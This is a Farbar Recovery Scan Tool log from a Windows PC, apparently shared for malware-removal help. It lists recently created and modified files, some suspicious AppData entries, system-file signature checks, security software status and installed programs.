2014-08-15 23:55 - 2014-07-24 13:49 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-08-15 23:55 - 2014-07-24 13:49 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-08-15 23:55 - 2014-07-24 13:48 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-08-15 23:55 - 2014-07-24 13:48 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-08-15 23:55 - 2014-07-24 13:48 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-08-15 23:55 - 2014-07-24 13:48 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-08-15 23:55 - 2014-07-24 13:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-08-15 23:55 - 2014-07-15 23:23 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-15 23:55 - 2014-07-15 22:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-08-15 23:55 - 2014-07-13 22:02 - 01216000 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-08-15 23:55 - 2014-07-13 21:40 - 00664064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-08-15 23:55 - 2014-07-08 22:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-08-15 23:55 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-08-15 23:55 - 2014-07-08 18:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-08-15 23:55 - 2014-07-08 18:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-08-15 23:55 - 2014-06-24 22:05 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-15 23:55 - 2014-06-24 21:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-08-15 23:55 - 2014-06-15 22:10 - 00985536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-08-15 23:55 - 2014-06-03 06:02 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-08-15 23:55 - 2014-06-03 06:02 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-08-15 23:55 - 2014-06-03 06:02 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-08-15 23:55 - 2014-06-03 06:02 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-08-15 23:55 - 2014-06-03 05:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-08-15 23:55 - 2014-06-03 05:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-08-15 23:55 - 2014-06-03 05:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2014-08-11 10:11 - 2014-08-11 10:11 - 00000342 _____ () C:\Windows\PFRO.log
2014-08-08 13:47 - 2014-08-08 18:22 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3878295211
2014-08-08 13:47 - 2014-08-08 14:23 - 00000030 _____ () C:\Users\FD-2\AppData\Roaming\3617758948
2014-08-08 13:47 - 2014-08-08 13:47 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\2433510085
2014-08-08 13:46 - 2014-08-11 10:10 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\502041251
2014-08-08 13:46 - 2014-08-08 18:23 - 00000000 ____D () C:\Users\FD-2\AppData\Local\98a319
2014-08-08 13:46 - 2014-08-08 13:47 - 00000000 ____D () C:\Users\FD-2\AppData\Local\browser_dir
2014-08-08 13:46 - 2014-08-08 13:46 - 49308698 _____ () C:\Users\FD-2\AppData\Roaming\3473679561
2014-08-08 13:46 - 2014-08-08 13:46 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3713821378
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\98a319
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\1712912303
2014-08-08 13:45 - 2014-08-08 18:26 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\3353960855

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 08:39 - 2014-09-01 00:55 - 00017658 _____ () C:\Users\FD-2\Downloads\FRST.txt
2014-09-01 08:39 - 2014-09-01 00:55 - 00000000 ____D () C:\FRST
2014-09-01 08:38 - 2014-09-01 08:38 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(2).exe
2014-09-01 08:34 - 2014-01-27 16:03 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-01 06:04 - 2013-08-19 20:21 - 00000000 ____D () C:\Program Files (x86)\Automatic Update
2014-09-01 05:03 - 2009-07-14 00:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-01 05:03 - 2009-07-14 00:45 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-01 05:00 - 2014-07-29 06:04 - 01587551 _____ () C:\Windows\WindowsUpdate.log
2014-09-01 02:13 - 2014-09-01 02:13 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(1).exe
2014-09-01 02:11 - 2014-09-01 02:10 - 05161948 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool(1).exe.part
2014-09-01 02:09 - 2014-09-01 02:09 - 05162600 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool.exe
2014-09-01 01:34 - 2009-07-14 01:13 - 00814438 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-01 01:27 - 2014-08-01 17:04 - 00000392 _____ () C:\Windows\setupact.log
2014-09-01 01:27 - 2014-01-27 16:03 - 00000890 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-01 01:27 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-01 01:22 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\SysWOW64\MUI
2014-09-01 01:22 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\MUI
2014-09-01 01:20 - 2014-09-01 01:22 - 03219456 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dgl.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 03219456 _____ (VMware, Inc.) C:\Windows\system32\vm3dgl.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00602112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstime.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00602112 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00217088 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dum.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00217088 _____ (VMware, Inc.) C:\Windows\system32\vm3dum.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00061440 _____ (VMware, Inc.) C:\Windows\SysWOW64\vsocklib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00061440 _____ (VMware, Inc.) C:\Windows\system32\vsocklib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00053248 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00053248 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLib.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00049152 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmhgfs.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00049152 _____ (VMware, Inc.) C:\Windows\system32\vmhgfs.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00032768 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLibJava.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00032768 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLibJava.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00016384 _____ () C:\Windows\SysWOW64\corpol.dll
2014-09-01 01:20 - 2014-09-01 01:22 - 00016384 _____ () C:\Windows\system32\corpol.dll
2014-09-01 01:07 - 2014-09-01 01:07 - 00001091 _____ () C:\Users\FD-2\Desktop\DllTool.lnk
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DllTool
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\KSafe
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\ProgramData\KSafe
2014-09-01 01:06 - 2014-09-01 01:06 - 08473440 _____ ( ) C:\Users\FD-2\Downloads\DllTool.exe
2014-09-01 01:06 - 2014-09-01 01:06 - 00000000 ____D () C:\Program Files (x86)\DllTool
2014-09-01 00:57 - 2014-09-01 00:57 - 00037443 _____ () C:\Users\FD-2\Downloads\Addition.txt
2014-09-01 00:55 - 2014-09-01 00:55 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64.exe
2014-09-01 00:20 - 2013-08-19 21:56 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-08-29 13:03 - 2013-08-19 20:21 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\Amadeus
2014-08-28 16:59 - 2014-07-09 10:43 - 00000000 ____D () C:\Users\FD-2\Desktop\Sharon
2014-08-28 03:20 - 2014-08-01 17:03 - 00495456 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-27 01:15 - 2014-08-27 01:15 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-08-25 13:38 - 2014-08-25 13:37 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-08-22 22:07 - 2014-08-27 23:55 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 21:45 - 2014-08-27 23:55 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2014-08-22 20:59 - 2014-08-27 23:55 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-16 04:11 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\rescache
2014-08-16 03:17 - 2013-08-19 22:17 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-16 03:08 - 2014-01-22 06:52 - 00000000 ____D () C:\Windows\system32\MRT
2014-08-16 03:07 - 2014-01-22 06:52 - 99218768 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-08-16 03:00 - 2014-05-06 03:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-08-14 20:36 - 2014-01-27 16:04 - 00002189 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-08-11 10:11 - 2014-08-11 10:11 - 00000342 _____ () C:\Windows\PFRO.log
2014-08-11 10:10 - 2014-08-08 13:46 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\502041251
2014-08-08 18:26 - 2014-08-08 13:45 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\3353960855
2014-08-08 18:23 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Local\98a319
2014-08-08 18:22 - 2014-08-08 13:47 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3878295211
2014-08-08 14:23 - 2014-08-08 13:47 - 00000030 _____ () C:\Users\FD-2\AppData\Roaming\3617758948
2014-08-08 13:47 - 2014-08-08 13:47 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\2433510085
2014-08-08 13:47 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Local\browser_dir
2014-08-08 13:46 - 2014-08-08 13:46 - 49308698 _____ () C:\Users\FD-2\AppData\Roaming\3473679561
2014-08-08 13:46 - 2014-08-08 13:46 - 00000004 _____ () C:\Users\FD-2\AppData\Roaming\3713821378
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\98a319
2014-08-08 13:46 - 2014-08-08 13:46 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\1712912303
2014-08-06 22:06 - 2014-08-15 23:55 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-06 22:01 - 2014-08-15 23:55 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-05 09:20 - 2010-11-20 23:27 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-08-04 17:24 - 2014-08-01 16:59 - 00116072 _____ () C:\Users\FD-2\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-04 12:01 - 2014-07-31 12:44 - 00000000 ____D () C:\Users\FD-2\Documents\Millenium Reports
2014-08-03 03:00 - 2009-07-13 22:34 - 00000478 _____ () C:\Windows\win.ini

Files to move or delete:
====================
C:\Users\FD-2\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\FD-2\g2ax_expert_downloadhelper_win32_x86.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-08-17 00:07

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 31-08-2014 02
Ran by FD-2 at 2014-09-01 08:40:31
Running from C:\Users\FD-2\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 6.0 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET NOD32 Antivirus 6.0 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

24im (Remove Only) (HKLM-x32\...\24im) (Version:  - 24im LLC)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.8.0.1430 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.8.0.1430 - Adobe Systems Incorporated) Hidden
Adobe Download Assistant (x32 Version: 1.2.6 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.8.800.94 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Amadeus FXG (HKLM-x32\...\{32EE59BC-4642-4CC5-810F-4A7720C89EF3}) (Version: 1.2.3 - Amadeus North America)
Amadeus NA Library (HKLM-x32\...\InstallShield_{B39B4400-4621-4AB7-BCDF-760626FB1027}) (Version: 2.0.0 - Amadeus North America)
Amadeus NA Library (x32 Version: 2.0.0 - Amadeus North America) Hidden
Amadeus RailKey Agent  (HKLM-x32\...\{83E92A83-EFB1-4699-A1E5-E3784235FB65}) (Version: 1.0.3 - Amadeus)
CCleaner (HKLM\...\CCleaner) (Version: 4.04 - Piriform)
Citrix Online Launcher (HKLM-x32\...\{C57F6C71-C365-4AFF-9108-397BBAD6127F}) (Version: 1.0.204 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.50.5.51 - Conexant)
CyberLink PowerDVD 9.6 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.6.1.4418 - CyberLink Corp.)
CyberLink PowerDVD 9.6 (x32 Version: 9.6.1.4418 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DataDirect ODBC driver for InterBase (HKLM-x32\...\DataDirect ODBC driver for InterBase) (Version:  - )
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{132D27B8-C656-44BD-8C16-73C54EA8A85F}) (Version:  - Microsoft)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DllTool 1.0 (HKLM-x32\...\{8C36FC6F-3576-447C-B15D-FF1504C91104}_is1) (Version:  - )
ESET NOD32 Antivirus (HKLM\...\{C2C49561-CD30-4A44-92AB-81BC2ECA2CB0}) (Version: 6.0.316.0 - ESET, spol s r. o.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 6.2.1.618 - Foxit Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
GoToAssist Customer 2.1.0.715 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.1.0.715 - Citrix Online)
ICVERIFY for Windows 4.2.0 (HKLM-x32\...\{C177DBBF-E6E7-4EF5-813A-CCD24267ACAA}) (Version: 4.2.0.0 - FDMS)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2712 - Intel Corporation)
Interbase XE (HKLM-x32\...\Interbase XE) (Version:  - )
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lotus NotesSQL 3.01 driver (HKLM-x32\...\{113EECD6-9A04-11D4-811D-00805F923B86}) (Version:  - )
Lotus SmartSuite - English (HKLM-x32\...\{536D6172-7453-7569-7465-392E38300409}) (Version: 9.8.0 - Lotus Development Corporation)
Macromedia Flash Player (HKLM-x32\...\{0456ebd7-5f67-4ab6-852e-63781e3f389c}) (Version: 7.0.19.0 - Macromedia, Inc.)
Microsoft .NET Compact Framework 2.0 (HKLM-x32\...\{625386A4-B6B6-4911-A6E8-23189C3F2D15}) (Version: 2.0.5239 - Microsoft Corporation)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office 2003 Primary Interop Assemblies (HKLM-x32\...\{91490409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.6553.0 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Outlook 2010 (HKLM-x32\...\Office14.OUTLOOK) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (x32 Version: 8.0.60940.0 - Microsoft Corporation) Hidden
Mozilla Firefox 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 31.0 - Mozilla)
Mozilla Thunderbird 31.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.0 (x86 en-US)) (Version: 31.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Panini 4.0 Universal Installer (HKLM-x32\...\{68FF4E69-53DC-485C-ADD9-E56FF9A406F8}) (Version: 4.00.300 - Panini)
PDFill PDF Editor with FREE Writer and FREE Tools (HKLM\...\{D1399216-81B2-457C-A0F7-73B9A2EF6902}) (Version: 11.0 - PlotSoft LLC)
PhotoShowExpress (x32 Version: 2.0.063 - Sonic Solutions) Hidden
QuickBooks (x32 Version: 24.0.4007.2403 - Intuit Inc.) Hidden
QuickBooks Pro 2014 (HKLM-x32\...\{4A21D17E-2FE8-42CD-88B7-ACF8E8860834}) (Version: 24.0.4007.2403 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Roxio Activation Module (x32 Version: 1.0 - Roxio) Hidden
Roxio BackOnTrack (x32 Version: 1.3.3 - Roxio) Hidden
Roxio Burn (x32 Version: 1.8 - Roxio) Hidden
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio Creator Starter (x32 Version: 1.0.439 - Roxio) Hidden
Roxio Creator Starter (x32 Version: 5.0.0 - Roxio) Hidden
Roxio Express Labeler 3 (x32 Version: 3.2.2 - Roxio) Hidden
Roxio File Backup (Version: 1.3.2 - Roxio) Hidden
Scanner Controller Web Client (HKLM-x32\...\{A597C45E-1662-4FC6-B1FF-BAC277888C9C}) (Version: 1.7.252 - ProfitStars)
ScanSnap (x32 Version: 4.2.31.1 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V4.2L32 - PFU)
ScanSnap Organizer (HKLM-x32\...\{E58F3B88-3B3E-4F85-9323-04789D979C15}) (Version: V3.2L13 - PFU)
ScanSnap Organizer (x32 Version: 3.2.13.1 - PFU LIMITED) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version:  - Microsoft) Hidden
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Superfare Scripts V1.0.24 (HKLM-x32\...\Superfare Scripts_is1) (Version:  - Shelley Consulting)
TCR 10 (HKLM-x32\...\TCR 10) (Version:  - )
